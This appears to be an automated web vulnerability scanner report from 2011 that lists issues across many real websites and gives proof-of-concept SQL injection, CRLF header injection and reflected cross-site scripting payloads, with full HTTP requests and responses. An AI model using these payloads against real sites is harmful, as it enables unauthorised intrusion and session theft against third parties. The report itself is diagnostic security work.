24.17. http://j2global.122.2o7.net/b/ss/j2globalonebox/1/H.23.3/s62614785584155

24.18. http://l.addthiscdn.com/live/t00/152lo.gif

24.19. http://media.extole.com/campaigns/onebox/images/favicon.ico

24.20. http://met1.hp.com/b/ss/hphqglobal,hpcsamerus,hpcsglobal,hphqna,hphqwwesg,hpcstsg/1/H.22/s64758445019833

24.21. http://myhelp.westnet.com.au/pages/releaseview.action

24.22. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.23. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.24. http://onebox.extole.com/offers/23073174/start

24.25. http://pagead2.googlesyndication.com/pagead/imgad

24.26. http://pixel.fetchback.com/serve/fb/pdc

24.27. http://printingcanvas.co.uk/

24.28. http://pro.hit.gemius.pl/_1305465394383/rexdot.gif

24.29. http://pubads.g.doubleclick.net/gampad/ads

24.30. http://r.turn.com/r/beacon

24.31. https://secure1.wn.com.au/passwordrecovery/

24.32. http://segment-pixel.invitemedia.com/pixel

24.33. http://shop.widevoip.com/statistics.php

24.34. https://shop.widevoip.com/index.php/index.php

24.35. http://smartsourcecollector.cardinal.com/dcsk07f7w00000kvtj6ne2kwn_1y4m/dcs.gif

24.36. http://store.mandriva.com/

24.37. http://support.magneticone.com/visitor/index.php

24.38. http://t.tmimgcdn.com/themes/default/css/main.css

24.39. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.40. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json

24.41. http://upc.d2.sc.omtrdc.net/b/ss/upcnl/1/H.22.1/s73489850417245

24.42. http://www.123stat.com/wtslog.js

24.43. http://www.3dcart.com/oscommerce_vs_3dcart.html

24.44. http://www.active24.co.uk/

24.45. http://www.active24.com/

24.46. http://www.active24.no/graphics/design/favicon.ico

24.47. http://www.allvoip.gr/

24.48. http://www.antarctica.gov.au/

24.49. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

24.50. http://www.burstnet.com/enlightn/3847/F156/

24.51. http://www.cvtelecom.cv/

24.52. http://www.ezosc.com/

24.53. http://www.gitzitinc.com/store/

24.54. http://www.google-analytics.com/__utm.gif

24.55. http://www.google.com/uds/Gfeeds

24.56. http://www.googleadservices.com/pagead/conversion/1071977981/

24.57. http://www.grics.qc.ca/

24.58. http://www.hp.com/edsredir/

24.59. http://www.internetnatrgovina.com/

24.60. http://www.ipandgo.net/

24.61. http://www.mailsite.com/

24.62. http://www.medianewsgroup.com/

24.63. http://www.mmabasket.com/

24.64. http://www.onebox.com/

24.65. http://www.oscommerce-manager.com/

24.66. http://www.redstage.com/magento2

24.67. https://www.regnow.com/checkout/cart/view

24.68. http://www.servercentral.com/

24.69. http://www.shopgrandmasattic.com/

24.70. http://www.templatemonster.com/oscommerce-templates.php

24.71. http://www.turk.net/Assets/css/dropdown/dropdown.css

24.72. http://www.upc.nl/upclive/

24.73. http://www.verizonbusiness.com/us/

24.74. http://www.vitexo.de/

24.75. http://www.westnet.com.au/index.html

24.76. https://www.widevoip.com/shop/index.php

24.77. http://www.wiktel.com/

24.78. http://www.woosh.com/

24.79. http://www.yourwebsitevalue.com/getsearchbox.cgi

24.80. http://www.youtube.com/v/ERP00q_xcuQ

24.81. http://www5.turk.net/twitter_net/default.aspx

24.82. http://www8.hp.com/us/en/services/it-services.html

25. Cacheable HTTPS response

25.1. https://mobile.westnet.com.au/

25.2. https://mobile.westnet.com.au/Default.aspx

25.3. https://myaccount.westnet.com.au/Login.aspx

25.4. https://secure1.wn.com.au/agents/login.aspx

25.5. https://secure1.wn.com.au/agents/lost_password.aspx

25.6. https://secure1.wn.com.au/passwordrecovery/

25.7. https://shop.widevoip.com/authentication.php

25.8. https://shop.widevoip.com/cart.php

25.9. https://shop.widevoip.com/img/favicon.ico

25.10. https://shop.widevoip.com/index.php/index.php

25.11. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

25.12. https://shop.widevoip.com/prices-drop.php

25.13. https://webmail.westnet.com.au/

25.14. https://www.regnow.com/checkout/cart/edit

25.15. https://www.regnow.com/checkout/cart/view

25.16. https://www.regnow.com/eds_new.html

25.17. https://www.regnow.com/favicon.ico

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://chadon.nl/favicon.ico

27.2. http://chadon.nl/server-info

27.3. http://chadon.nl/st/js/jquery.min.php

27.4. http://chileadmin.com/phpinfo.php

27.5. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

27.6. http://content-interface.iinet.net.au/async/content/play/video/high/5619

27.7. http://corporate.britannica.com/navigation_pane.html

27.8. http://d.xp1.ru4.com/um

27.9. http://fls.doubleclick.net/activityi

27.10. http://hostdotbr.com/favicon.ico

27.11. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.12. http://shops.oscommerce.com/directory/goto,21173

27.13. http://shops.oscommerce.com/directory/goto,25203

27.14. http://shops.oscommerce.com/directory/goto,26271

27.15. http://shops.oscommerce.com/directory/goto,26272

27.16. http://shops.oscommerce.com/directory/goto,28398

27.17. http://shops.oscommerce.com/directory/goto,29108

27.18. http://shops.oscommerce.com/directory/goto,34234

27.19. http://shops.oscommerce.com/directory/goto,38927

27.20. http://shops.oscommerce.com/directory/goto,41852

27.21. http://shops.oscommerce.com/directory/goto,43516

27.22. http://shops.oscommerce.com/directory/goto,43678

27.23. http://shops.oscommerce.com/directory/goto,43679

27.24. http://shops.oscommerce.com/directory/goto,43680

27.25. http://shops.oscommerce.com/directory/goto,43683

27.26. http://shops.oscommerce.com/directory/goto,43684

27.27. http://shops.oscommerce.com/directory/goto,43685

27.28. http://shops.oscommerce.com/directory/goto,43687

27.29. http://shops.oscommerce.com/directory/goto,43688

27.30. http://shops.oscommerce.com/directory/goto,43689

27.31. http://shops.oscommerce.com/directory/goto,43690

27.32. http://shops.oscommerce.com/directory/goto,43691

27.33. http://shops.oscommerce.com/directory/goto,43692

27.34. http://shops.oscommerce.com/live_shops_frameset_header.php

27.35. http://trip11209.cz.cc/js/jquery.min.php

27.36. http://www.3dcart.com/oscommerce_vs_3dcart.html

27.37. http://www.active24.co.uk/custom_asp/defaultjs.asp

27.38. http://www.excelldirect.com/

27.39. http://www.mailsite.com/

27.40. http://www.mailsite.com/Contacts/default.asp

27.41. http://www.mailsite.com/common/reporterror.asp

27.42. http://www.mailsite.com/company/customers.asp

27.43. http://www.mailsite.com/contacts/

27.44. http://www.mailsite.com/favicon.ico

27.45. http://www.mailsite.com/portal/

27.46. http://www.mailsite.com/portal/cases/

27.47. http://www.mailsite.com/portal/cases/cases.asp

27.48. http://www.mailsite.com/portal/download.asp

27.49. http://www.mailsite.com/portal/trial.asp

27.50. http://www.mailsite.com/portal/unsubscribe.asp

27.51. http://www.mailsite.com/portal/updateprofile.asp

27.52. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

27.53. http://www.mailsite.com/support/

27.54. http://www.redstage.com/magento2/

27.55. https://www.regnow.com/favicon.ico

27.56. http://www.teleflora.com/

27.57. http://www.teleflora.com/js/tf_homepagejs.asp

27.58. http://www.turk.net/images/ana_header.jpg

27.59. http://www.vitexo.de/support/server.php

27.60. http://www.yourwebsitevalue.com/getsearchbox.cgi

27.61. http://www.yourwebsitevalue.com/getsearchvalueex.cgi

28. HTML uses unrecognised charset

28.1. http://finans.turk.net/altin/

28.2. http://finans.turk.net/borsa/

28.3. http://hostdotbr.com/

28.4. http://www.allvoip.gr/

28.5. http://www.echalk.com/

28.6. http://www.echalk.com/impact/on-the-road/

28.7. http://www.echalk.com/impact/what-echalk-means-to-me/

28.8. http://www.mavi1.org/

28.9. http://www.mavideniz1.org/

28.10. http://www.mavideniz1.org/orta.htm

28.11. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

28.12. http://www.siyamiozkan.com.tr/

28.13. http://www.siyamiozkan.com.tr/orta.htm

28.14. http://www.turk.net/

28.15. http://www.turk.net/mansetFrame.asp

29. Content type incorrectly stated

29.1. http://action.media6degrees.com/orbserv/hbjs

29.2. http://allvoip.gr/favicon.ico

29.3. http://cfe713.r.axf8.net/mr/a.gif

29.4. http://chadon.nl/st/js/jquery.min.php

29.5. http://content-interface.iinet.net.au/async/content/browse/westnet/fetchtv

29.6. http://content-interface.iinet.net.au/async/content/play/video/high/5619

29.7. http://foto.turk.net/sinema/movieImages/13052011114033_222.jpg

29.8. http://hc2.humanclick.com/hcp/html/mTag.js

29.9. http://hostdotbr.com/favicon.ico

29.10. http://hp-www.baynote.net/baynote/tags3/common

29.11. http://intelligence.dgmsearchlab.com/xdom/readcook.ashx

29.12. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

29.13. http://mods4rides.com/images/i=ELocker-Dana304pinon.jpg&partNo=EAT&w=380

29.14. http://myhelp.westnet.com.au/s/1116/1/5/_/includes/js/yui/fonts/fonts-min.css

29.15. http://myhelp.westnet.com.au/s/1116/1/5/_/includes/js/yui/menu/assets/menu.css

29.16. http://myhelp.westnet.com.au/s/1116/1/7/_/includes/js/yui/fonts/fonts-min.css

29.17. http://myhelp.westnet.com.au/s/1116/1/7/_/includes/js/yui/menu/assets/menu.css

29.18. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.19. https://shop.widevoip.com/cart.php

29.20. https://shop.widevoip.com/img/favicon.ico

29.21. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php

29.22. http://tags.mediaforge.com/js/189

29.23. http://teleflora.edgesuite.net/Images/vendors/00005557/spring-submit-vd.jpg

29.24. http://trip11209.cz.cc/js/jquery.min.php

29.25. http://webchat.rockliffe.com:9090/webchat/common.js

29.26. http://webchat.rockliffe.com:9090/webchat/live

29.27. https://webmail.westnet.com.au/includes/javascript/menu_main.js

29.28. http://www.active24.co.uk/custom_asp/defaultjs.asp

29.29. http://www.amberetc.co.uk/ws/images/A1BR024.jpg

29.30. http://www.amberetc.co.uk/ws/images/A1BR024MIX.jpg

29.31. http://www.cardinal.com/mps/themes/html/Cardinal/favicon.ico

29.32. http://www.casagrandehospital.com/favicon.ico

29.33. http://www.corecommerce.com/images/favicon.ico

29.34. http://www.cvtelecom.cv/sites/default/files/cvtelecom_favicon.ico

29.35. http://www.echalk.com/favicon.ico

29.36. http://www.eshopfitters.co.uk/favicon.ico

29.37. http://www.facebook.com/extern/login_status.php

29.38. http://www.gelifesciences.com/ezm/profiles.nsf/ListInitialCountryRedirectsAsArray.js

29.39. http://www.google.com/mbd

29.40. http://www.google.com/search

29.41. http://www.ipandgo.net/favicon.ico

29.42. http://www.mailsite.com/quicklinks.js

29.43. http://www.mavi1.org/soultip.js

29.44. http://www.mavi1.org/yorumyaz.jpg

29.45. http://www.munichmyway.com/js/config.js

29.46. http://www.munichmyway.com/templates/common/products/productProperties.cfm

29.47. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/images/icons/green_tick.jpg

29.48. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/images/icons/homePano_phoneIcon_lrg.png

29.49. https://www.new.onebox.com/ereceptionist-api/signup/getAllOBRatePlans

29.50. https://www.new.onebox.com/ereceptionist-api/signup/getCurrencyType

29.51. https://www.new.onebox.com/ereceptionist-api/signup/getSessionCurrency

29.52. http://www.onbile.com/websites/0521accad976e199620f2fe160d311fa

29.53. http://www.pepperdine.edu/images/template/base/footerbg.jpg

29.54. http://www.redstage.com/favicon.ico

29.55. https://www.regnow.com/favicon.ico

29.56. http://www.teleflora.com/js/tf_homepagejs.asp

29.57. http://www.turk.net/mansetFrame.asp

29.58. http://www.vitexo.de/support/server.php

29.59. http://www.westnet.com.au/img/fetchtv/big_whitebox_top.gif

29.60. http://www.yourwebsitevalue.com/getsearchvalueex.cgi

30. Content type is not specified



1. SQL injection
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.cvtelecom.cv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cvtelecom.cv
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20242989%20or%201%3d1--%20 and 20242989%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?120242989%20or%201%3d1--%20=1 HTTP/1.1
Host: www.cvtelecom.cv
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=pl2aq2cevdnsrm7538jfmi53u4; path=/; domain=.cvtelecom.cv
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:17:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr">
   <he
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c62f92e3c588be673157d8dd883109c1" value="form-c62f92e3c588be673157d8dd883109c1" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>

</div></form>
                                                   </div>
                                                   <div id="mainMenu">
<ul class="menu"><li class="leaf first active-trail"><a href="/node" class="active">Início</a></li>
<li class="collapsed"><a href="/node/44">Empresa</a></li>
<li class="collapsed"><a href="/produtos_para_si">Serviços</a></li>
<li class="collapsed"><a href="/horoscopo">Entretenimento</a></li>
<li class="leaf"><a href="/noticias">Notícias</a></li>
<li class="leaf"><a href="/eventos">Eventos</a></li>
<li class="leaf"><a href="/node/50">Informações úteis</a></li>
<li class="leaf last"><a href="/node/51">Links</a></li>
</ul></div>                                            </div>
                   <div class="cleaner"></div>
                   <div id="banner">
                                                   <div id="block-views-banner_home_page-block_1" class="clear-block block block-views">


<div class="content"><div class="view view-banner-home-page view-id-banner_home_page view-display-id-block_1 view-dom-id-1">



<div class="view-content">
<div class="item-list views-rotator views-rotator-banner_home_page-block_1 clear-block">
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-prev"></a></span>
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-next"></a></span>
<div id="views-rotator-banner_home_page-block_1">
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="field-content"><img src="http://www.cvtelecom.cv/sites/default/files/imagecache/banner_home_full/banner_cvt_1.png" alt="" title="" class="imagecache imagecache-banner_home_full imagecache-default imagecache-banner_home_full_default" width="673" height="260" /></span>
</div>
</div>
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="fi
...[SNIP]...

Request 2

GET /?120242989%20or%201%3d2--%20=1 HTTP/1.1
Host: www.cvtelecom.cv
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=1gp06061jt7aon6668v56u0eq0; path=/; domain=.cvtelecom.cv
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:17:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr">
   <he
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-7c2c668610fef194795457b4ae63e2c6" value="form-7c2c668610fef194795457b4ae63e2c6" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>

</div></form>
                                                   </div>
                                                   <div id="mainMenu">
<ul class="menu"><li class="leaf first active-trail"><a href="/node" class="active">Início</a></li>
<li class="collapsed"><a href="/node/44">Empresa</a></li>
<li class="collapsed"><a href="/produtos_para_si">Serviços</a></li>
<li class="collapsed"><a href="/horoscopo">Entretenimento</a></li>
<li class="leaf"><a href="/noticias">Notícias</a></li>
<li class="leaf"><a href="/eventos">Eventos</a></li>
<li class="leaf"><a href="/node/50">Informações úteis</a></li>
<li class="leaf last"><a href="/node/51">Links</a></li>
</ul></div>                                            </div>
                   <div class="cleaner"></div>
                   <div id="banner">
                                                   <div id="block-views-banner_home_page-block_1" class="clear-block block block-views">


<div class="content"><div class="view view-banner-home-page view-id-banner_home_page view-display-id-block_1 view-dom-id-1">



<div class="view-content">
<div class="item-list views-rotator views-rotator-banner_home_page-block_1 clear-block">
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-prev"></a></span>
<span><a id ="views-rotator-banner_home_page-block_1-views-rotator-next"></a></span>
<div id="views-rotator-banner_home_page-block_1">
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="field-content"><img src="http://www.cvtelecom.cv/sites/default/files/imagecache/banner_home_full/banner_cvt_1.png" alt="" title="" class="imagecache imagecache-banner_home_full imagecache-default imagecache-banner_home_full_default" width="673" height="260" /></span>
</div>
</div>
<div class="views-rotator-item">
<div class="views-field-field-banner-imagem-fid">
<span class="fi
...[SNIP]...

1.2. http://www.oscommerce.com/about/news,135 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.oscommerce.com
Path:   /about/news,135

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/news,135' HTTP/1.1
Host: www.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.2.10.1305467786

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:03:57 GMT
Server: Apache/2.2.17
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 51679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>


...[SNIP]...
<a href="http://www.oscommerce.com/about/news,32">TEP on PostgreSQL</a>
...[SNIP]...

2. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dc131%0d%0a03859863396 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /dot.gifdc131%0d%0a03859863396?;ord=8268244 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vehix.com/tagFrame.aspx?ResourceID=B5000000000001&Width=300&Height=120&Parameters=Size%3D300x120%2CTile%3D3%2CWidth%3D300%2CHeight%3D120%2CSite%3Dveh%2CSegment%3Dhomepage%2CBrand%3DVehix%2CSection%3Dhp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdc131
03859863396
:
Date: Sun, 15 May 2011 13:20:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 191 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.ligatus.com/timeout.php [ids parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb330"><script>alert(1)</script>c8f40f3c5bb was submitted in the ids parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:55 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:50:55 GMT
Connection: Keep-Alive
Content-Length: 117

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=20468cb330"><script>alert(1)</script>c8f40f3c5bb"></script>

3.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /timeout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ee8"><script>alert(1)</script>10488149e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /timeout.php?ids=2/18ee8"><script>alert(1)</script>10488149e130468 HTTP/1.1
Host: a.ligatus.com
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:42:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:52:25 GMT
Connection: Keep-Alive
Content-Length: 118

<script src="http://e.ligatus.com/LigatusFallback.gif?ids=2/18ee8"><script>alert(1)</script>10488149e130468"></script>

3.3. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c6f80<script>alert(1)</script>ee62fdbac8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_71956589444c6f80<script>alert(1)</script>ee62fdbac8&pid=af7122e5-4c62-4cc3-8101-6135977842f7&s=125x125&f=0.1&cid=oxpv1%3A77279-136486-292439-24659-97363&hrid=706e05206430ac3829623829022d2dd1-1305468107&url=http%3A%2F%2Fwww.oscommerce-manager.com%2F%3F8b64d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed053e3a864d%3D1&referer=http%3A%2F%2Fburp%2Fshow%2F7 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
